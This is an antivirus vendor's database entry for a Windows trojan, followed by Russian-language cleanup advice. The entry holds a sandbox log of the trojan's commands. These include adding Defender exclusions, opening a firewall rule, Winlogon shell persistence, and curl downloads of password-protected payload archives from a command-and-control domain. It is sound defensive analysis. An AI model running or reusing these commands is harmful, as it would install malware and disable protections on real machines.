Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen31.55663
Добавлен в вирусную базу Dr.Web:
2025-09-12
Описание добавлено:
2025-09-13
Technical Information
To ensure autorun and distribution
Modifies the following registry keys
[HKLM\software\microsoft\windows nt\currentversion\winlogon] 'shell' = 'explorer.exe, "%LOCALAPPDATA%\google\chrome\user data\wzone.exe" "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wloca...
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'
Executes the following
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="windows defender" dir=in action=allow program="%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" enable=yes
Modifies file system
Creates the following files
Sets the 'hidden' attribute to the following files
%LOCALAPPDATA%\google\chrome\user data\01.txt
%LOCALAPPDATA%\google\chrome\user data\s01.txt
%LOCALAPPDATA%\google\chrome\user data\wtime.cmd
%LOCALAPPDATA%\google\chrome\user data\7z.dll
%LOCALAPPDATA%\google\chrome\user data\7z.exe
%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe
%LOCALAPPDATA%\google\chrome\user data\wzone.exe
Network activity
Connects to
'ip##fo.io':443
'c.###titmp.net':443
'7-##p.org':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
'ze###tmp.net':443
TCP
Other
'ip##fo.io':443
'c.###titmp.net':443
'7-##p.org':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
UDP
DNS ASK ip##fo.io
DNS ASK c.###titmp.net
DNS ASK 7-##p.org
DNS ASK gi##ub.com
DNS ASK re#########ets.githubusercontent.com
DNS ASK ze###tmp.net
Miscellaneous
Creates and executes the following
'%TEMP%\qb0d1722.00\gkey.exe'
'%TEMP%\7z2201.exe' /S
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\m.7z" -o"%LOCALAPPDATA%\Temp" -pconfigvpnG2012885838482012ggg -y
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' %TEMP%\m.bat
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\NetFramework.4.8.7z" -o"%LOCALAPPDATA%\google\chrome\user data" -pvgfjyghtnhnlfjh7trhjfnhfg -y
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" -yr001
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001
Executes the following
'<SYSTEM32>\cmd.exe' /C start "" "%TEMP%\qb0D1722.00\gkey.exe"
'<SYSTEM32>\mode.com' 120, 31
'<SYSTEM32>\net.exe' session
'<SYSTEM32>\net1.exe' session
'<SYSTEM32>\cmd.exe' /C copy "%TEMP%\qb0D1B1A.00\cnf" "%TEMP%\cnf"
'<SYSTEM32>\cmd.exe' /c wmic path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\wbem\wmic.exe' path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:32
'<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:32
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /C dir /S "%ProgramFiles%\Kaspersky Lab\*.exe"
'<SYSTEM32>\cmd.exe' /C dir /S "%ProgramFiles(x86)%\Kaspersky Lab\*.exe"
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/ip -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/ip -k
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/country -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/country -k
'<SYSTEM32>\wbem\wmic.exe' os get caption
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 7" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 7"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 8" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 8"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 8.1" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 8.1"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 10" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 10"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 11" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 11"
'<SYSTEM32>\cmd.exe' /c curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\7z2201.exe" -L -C - "https://www.7-zip.org/a/7z2201.exe" --retry 3
'<SYSTEM32>\cmd.exe' /C start "" "%TEMP%\7z2201.exe" /S
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\m.7z" -L "https://zeltitmp.net/pp/m.7z" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\m.bat""
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\NetFramework.4.8.7z" -L -C - "https://zeltitmp.net/pp/NetFramework.4.8.7z" --user-agent "cnfvp201" --retry 3
'<SYSTEM32>\attrib.exe' +h +s "%LOCALAPPDATA%\google"
'<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v "shell" /t reg_sz /d "explorer.exe, \"%LOCALAPPDATA%\google\chrome\user data\wzone.exe\" \"%LOCALAPPDATA%\google\chrome\user ...
'<SYSTEM32>\curl.exe' -k -L "https://zeltitmp.net/pp/cu/cu_p.php?ip=18#.#3.40.66&vos=10&cid=RU&sid=goddy46&s=1" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"
'<SYSTEM32>\cmd.exe' /C del %TEMP%\cnf
'<SYSTEM32>\cmd.exe' /C del %TEMP%\cc.7z
'<SYSTEM32>\ping.exe' -n 10 127.0.0.1
'<SYSTEM32>\ping.exe' -n 3 127.0.0.1
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"' (with hidden window)
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001' (with hidden window)
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK